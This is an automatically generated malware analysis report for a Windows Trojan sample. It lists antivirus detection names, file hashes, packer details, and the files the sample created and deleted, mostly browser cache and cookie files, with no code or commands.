Gen.Variant.Symmi.63061_0a45cf9261

by malwarelabrobot on January 4th, 2017 in Malware Descriptions.

Gen:Variant.Symmi.63061 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.DownLoader23.30163 (DrWeb), Gen:Variant.Symmi.63061 (B) (Emsisoft), Heur.AdvML.B (Symantec), Gen:Variant.Symmi.63061 (FSecure), Win32/DH{JDWBDgOCHA?} (AVG), Win32:Evo-gen [Susp] (Avast), Gen:Variant.Symmi.63061 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 0a45cf92610ba8fb67ae04b721564c6f
SHA1: ca09bc1e68fe3d74c744c4dff6ff3cb2903f7ba4
SHA256: b2ac42fbf3d400f9ecd7a0bdb3bdd15a60824ee4abeb49955f52d1d5239f2543
SSDeep: 24576:XMgQGaTSHPJ3h88jy/agng1vNYRgLDgWOVDSzILnfnuCL:cgQGaTYJRVG/aZ1eO/gW8DScP
Size: 1032672 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company:
Created at: 2012-09-21 05:38:23
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

0a45cf92610ba8fb67ae0b721564c6f.exe:2072
%original file name%.exe:3504

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 0a45cf92610ba8fb67ae0b721564c6f.exe:2072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Windows\DkVcUC\FseFDmQKm.dll (264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Windows\System32\205bd5\CDClient_EX.sys (117 bytes)
C:\Windows\CLOG.txt (87 bytes)
C:\Windows\ecQMJQN.dll (12 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Windows\DkVcUC\oyARLxIYS.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tIyAnb\0a45cf92610ba8fb67ae0b721564c6f.exe (25 bytes)
C:\Windows\3.txt (864 bytes)
C:\Windows\DkVcUC\BuSsSLo.dll (15394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Windows\System32\205bd5\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Windows\ecQMJQN.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Windows\DkVcUC\oyARLxIYS.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Windows\DkVcUC\FseFDmQKm.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tIyAnb\0a45cf92610ba8fb67ae0b721564c6f.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
